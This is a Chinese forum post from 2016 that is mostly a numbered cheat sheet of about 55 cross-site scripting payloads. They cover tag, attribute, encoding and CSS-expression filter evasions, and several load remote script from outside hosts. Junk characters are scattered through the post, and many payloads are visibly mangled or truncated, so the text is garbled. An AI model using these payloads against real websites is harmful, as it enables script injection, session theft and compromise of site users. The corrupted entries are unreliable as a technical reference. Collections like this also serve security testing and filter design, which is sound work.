(1)普通的XSS JavaScript注入
) M5 `1 B% \& f9 I! W7 V% _<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# s' r* ^1 X1 x(99)另类弹框; D5 T! B& J9 Z/ X; {
<q/oncut=alert()>10 F9 r7 e; z5 F" G/ b+ Y, C) U
<s/onclick=alert()>b3 D8 N. _6 R5 A/ r% A0 q) Z4 l
<XSS=" onclick="alert(1)//">clickme</SSX=">/ u6 P0 o/ C ^ j J3 y$ z- E
<zzz onclick=alert`1`>clickme</zzz> " v) E1 S) i! M
<a onclick=alert`1`>clickme</a>4 I2 y& }$ M. ~" \ q3 {8 Y8 |2 l
<a=">clickme</a=">% \) j. x: S4 b
<a=">clickme</a>
0 ^5 ^) ~1 B% Q<z=">clickme</z=">
# s6 l6 T; H& P# @. }1 @; `<z onclick=alert`1`>clickme</z>
, A7 ~% _, Z! {. [4 y* _( f$ a
& d, g; r% p+ p% D q! ~! V(2)IMG标签XSS使用JavaScript命令
/ D8 k) T) D" s! J: V7 E2 A# r<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
7 q6 X# {, W* V" s5 Z
+ O' |9 o5 P8 b1 K. o, u2 E0 K# r(3)IMG标签无分号无引号
. u% u$ h# b8 v<IMG SRC=javascript:alert(‘XSS’)>
: J: o' D) s- V1 r* |5 M$ `6 d
( S9 E3 Y# H) k' _) x$ F(4)IMG标签大小写不敏感) O' r' v& h1 `8 s; ]+ W! M
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% T5 x# e4 t# i8 J# m' T* w% b- ^: x2 S/ j# d! P+ e& d) z
(5)HTML编码(必须有分号): G! o& ]* y6 {& [9 r" E9 V
<IMG SRC=javascript:alert(“XSS”)>! K; m/ n, L7 ?& O1 N( ^
* `1 W( J4 Z9 F+ R; X1 H+ i+ ] O& p(6)修正缺陷IMG标签2 ~# ]: K9 B7 v' y
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; K4 \7 @. F1 Z6 g0 X
* x3 Z1 B# v0 {0 L
(7)formCharCode标签(计算器)
3 i0 I6 ?0 v+ V& Q<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
, O: b# N, ]5 F" D# n/ F% n! u+ v. P0 B& M! B/ r$ M- W% p& @
(8)UTF-8的Unicode编码(计算器)
; G* N2 _! z# d- P! v6 N<IMG SRC=jav..省略..S')>
4 [" C; N& n: D' e, y
. d/ ]! b* C1 f: `# c$ `; k(9)7位的UTF-8的Unicode编码是没有分号的(计算器), |( ]- O0 ^4 ~ ?# F% G- v
<IMG SRC=jav..省略..S')>4 b* e7 S: D; a( ?, P: G
" v5 x {9 G! ]9 \9 A
(10)十六进制编码也是没有分号(计算器)- b& X7 L% `' A% _$ p6 P- k
<IMG SRC=\'#\'" /span>: `7 ~: Q( j9 E2 M
, @9 s( S% |1 \(11)嵌入式标签,将Javascript分开
# Y. |1 V X# G$ q; [% Y<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
9 Y" S2 g2 b. H" }8 D j2 p) w$ j
, H. p6 H+ j6 f! C3 T3 d& l(12)嵌入式编码标签,将Javascript分开9 H$ V. j& r# o* ?; |+ n
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ w, |! o( N: O' o' O
' _$ K# K* u8 [(13)嵌入式换行符
: B1 W# |- t9 @+ o6 ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
3 U9 o7 H: z9 f/ v" H( o1 w- t' H0 R. I
(14)嵌入式回车
& P: G2 Z( N" \- [# O0 Y! y& A<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>% V' j) Q& ^- k( k
, v) ]( y4 S3 @1 B- e, J3 ]2 L
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ R" a# N' s! C) s% T9 C; L1 T<IMG SRC=\'#\'" /span>
+ L: G) |) \$ v# [5 W
5 a' Y0 i1 r( \! G8 g7 a(16)解决限制字符(要求同页面)
+ R" j+ \2 d) C8 D$ o+ I<script>z=’document.’</script>
. z! P! Q! I2 l. x% K* U; ~7 B<script>z=z+’write(“‘</script>
, M1 R, {6 \9 o' R/ [8 w<script>z=z+’<script’</script>
9 Y- @" H! Q; H* x6 b! c' t. D0 }<script>z=z+’ src=ht’</script>& f$ Q, w7 N; [! s [ h* t
<script>z=z+’tp://ww’</script>
- _' X6 a8 n5 v9 H$ c3 y* b<script>z=z+’w.shell’</script>1 n9 s4 P1 N" q1 x$ P8 N" |
<script>z=z+’.net/1.’</script>+ u3 Q, ]! x9 a# m3 b- j
<script>z=z+’js></sc’</script>
' |0 L* U) y) i; b<script>z=z+’ript>”)’</script>; K2 u3 d# J. ~+ ~/ c
<script>eval_r(z)</script>- k8 `: t, d8 L" j4 t8 }1 m
; V. ~+ k. y! ^
(17)空字符
) d# U$ |1 ^. _7 ?3 d" P+ c; Wperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
5 O$ ^ w# p# x
# `: x: K/ S, k5 a5 P(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
1 A" n) K+ g9 ?9 R5 p% V& Qperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
. O: M' z1 _0 V7 ]0 f% z" B6 M( q7 o
(19)Spaces和meta前的IMG标签
# l4 [5 c6 T3 ?4 [( F2 f<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
6 P7 G( E+ Z3 A/ x: w6 f3 r1 d+ d" a% k0 ~( E6 E
(20)Non-alpha-non-digit XSS; X) v) |: `1 S- R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT> n6 P' q: R/ Q f# \: e% B0 M, q
5 v! y" X8 Y' \6 k% @(21)Non-alpha-non-digit XSS to 2. {7 i! q& b; U* a, l. r6 B
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>5 p% H6 u5 s# G9 O, n
' q* t: u) k/ ]% i: o3 Y(22)Non-alpha-non-digit XSS to 3% r Z, E+ `& a$ O& U
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
4 o) z/ A1 q! l
L# I" U) O1 v! }8 P* s(23)双开括号% q! P: z" V& r; R q7 k6 M- M
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
; y) w# C7 ]* @* j( P+ d `% ^
8 ~) c& p& W% p5 ]( g(24)无结束脚本标记(仅火狐等浏览器)9 w1 v2 Z( n) n* X0 v# J, z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>0 o3 E) H! w( j& y
4 z: r1 L+ {! j* w
(25)无结束脚本标记2! U6 D- J) _4 n# Z: t- {
<SCRIPT SRC=//3w.org/XSS/xss.js>: Q, e6 r' i! o9 T% e5 v$ G
" ?3 g' ^, u4 W; r6 o: x(26)半开的HTML/JavaScript XSS
1 Y; z9 T9 K9 C0 M3 R) Y<IMG SRC=\'#\'" /span>
8 y& T) k9 ]8 `; J
6 N+ O6 l& U# I: _! D w' o# f(27)双开角括号
& G3 N8 d! Y9 R* f( @<iframe src=http://3w.org/XSS.html <
( G( D9 Q* g; c& T& f" @6 z
2 J- g# f5 T' |, N2 D8 B7 r(28)无单引号 双引号 分号
- A. R8 b6 p$ z0 \<SCRIPT>a=/XSS/' f: D* v4 a j
alert(a.source)</SCRIPT>
/ G n5 K# q: i" X8 }/ w+ V/ ~' j. A% g
(29)换码过滤的JavaScript. @9 S* X5 q- M/ B2 c2 V& N4 @" W2 `
\”;alert(‘XSS’);//) l6 O' x0 y" e0 k
! d5 e) ?) H, S- E(30)结束Title标签3 D* {' B8 ]4 ~% L4 h7 F* h( N( h
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>3 O( ^4 t9 z+ Y# v3 b
k8 [, Q" W2 y+ V8 f$ e(31)Input Image
+ s4 z8 t5 T Y0 n. J- e1 s<INPUT SRC=\'#\'" /span>
}5 S6 G1 x& m' S4 X: y j: C/ a
: I" B& r" h2 K( }, g I4 Z g. ](32)BODY Image9 d4 X5 L( A- x* {% h7 r0 O
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
1 }; M1 B2 w1 P& | M5 m( G. l4 P5 f8 {* T$ k& t- e2 }9 O3 s- L
(33)BODY标签
# O6 V/ Z( v: g4 T x<BODY(‘XSS’)>/ M3 A3 @! ~( M H+ w
; I+ r- ?/ ~( Z7 Z9 J) R; J(34)IMG Dynsrc
3 x. f2 U" q3 {) S<IMG DYNSRC=\'#\'" /span>
* R) f& @" d4 q7 W/ S, \( |+ A2 Z( S: W& U4 T1 S
(35)IMG Lowsrc
- C* {9 W, N$ ` k x4 C- ]$ H6 }<IMG LOWSRC=\'#\'" /span>
3 k7 e) ]. T% a' D1 T6 _4 w
8 C2 ?' k4 Z+ m$ X(36)BGSOUND
: ?% W4 X/ \5 m; E& ?9 M4 k<BGSOUND SRC=\'#\'" /span>
* h4 _& F: U" y8 }; v
( b7 W( J! P6 V. t6 n0 Y(37)STYLE sheet
0 K; }- }2 k3 }+ U+ b; K<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 S% @) @& s" r
8 C7 I( p: l$ B& I' K# S& p(38)远程样式表
+ x/ Z7 B+ u8 e0 ` {0 X. C0 N/ y8 B<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>& Q- @2 M6 g. r5 d$ W0 {
4 Z) A, o8 V8 C* j3 ]; A(39)List-style-image(列表式)( W4 J6 k+ F6 N9 j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
6 ]- q( G* e" o. ]2 Y. A8 h8 i
7 I9 I& G$ v8 Y; A9 }(40)IMG VBscript& M. v* e3 \0 X/ t7 k8 N
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
0 C) V) j# D' M9 i* n# N: e' O5 T' C/ P' j3 d& R5 w, J
(41)META链接url
9 F5 X* r& n: R<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
6 W# S7 x2 o. g7 F8 s
( | W- {/ N; ~9 k k5 o( ](42)Iframe
5 M# {$ K; Y: x6 V" X& e# J6 Y<IFRAME SRC=\'#\'" /IFRAME>: x3 F8 P. D$ w+ `7 N2 i3 j: S
* c7 Z, P5 ]$ c$ ?' L& a
(43)Frame+ m k& D+ u, U8 Q0 t3 r4 O: P1 E
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
) G9 h4 C4 n, E# h7 { M$ S! z* D, b9 Y3 M5 Q% b Z( [
(44)Table
$ f% F) M! ]" i3 _% j9 X% [<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( j# n* p3 l4 |, `% P* L) L; T: d# b
(45)TD; \9 o ]+ e4 t @- u
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>: k: n* A; d9 h( t5 F6 g
" W, y/ G {* s
(46)DIV background-image
! D1 V" s$ I8 G. ~' G$ i; N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
' |/ v( o% Z+ c- f: I- P4 ?
! E( \0 S4 }8 O/ \3 H, t; L4 x(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 S) q9 d; @7 p' b; W& ?- Z<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
' I$ ?8 E+ @6 P% j
- I% }2 V3 \6 G+ W/ y: Y( @(48)DIV expression* \/ l% }. a. c4 n
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>, }! I$ Y* C+ c
8 R3 r8 V* v" j1 c
(49)STYLE属性分拆表达
) i; H* p0 ? o& S' X- A<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! f- I: X+ z: T) m h$ q D& o% m8 Q
(50)匿名STYLE(组成:开角号和一个字母开头)
& a# L5 v9 s# u2 g6 [+ _+ c4 l<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>3 }/ V+ |4 I4 h. i
# B& B8 j+ N8 Q+ x6 r( O1 {) e- \
(51)STYLE background-image$ E: @7 K. F- P1 n3 `" D
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 H2 F8 _; |; V3 U
g0 Q1 [5 G0 n& P. N
(52)IMG STYLE方式. A( i- [( z; I
exppression(alert(“XSS”))’>" ~, O# O6 q2 w/ _4 V# B" Y& n5 s" `
- x. x/ B l7 _3 v* L* j3 a# C
(53)STYLE background+ e1 h" `* W. Q: {7 a6 q- x W: Q
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' J' o/ Y( E: }. @ S' v. ? d! |$ R/ |' |- e( L
(54)BASE A5 s3 w2 A4 |8 R
<BASE HREF=”javascript:alert(‘XSS’);//”>
( Q& A/ D2 r* o" d5 V9 [: V& J9 x v5 x# r
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS3 X/ w1 V0 n' ~' l8 S
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>5 `( S b$ ~8 z4 F+ W
|
发表于 2016-4-28 10:06:15
收藏
支持
反对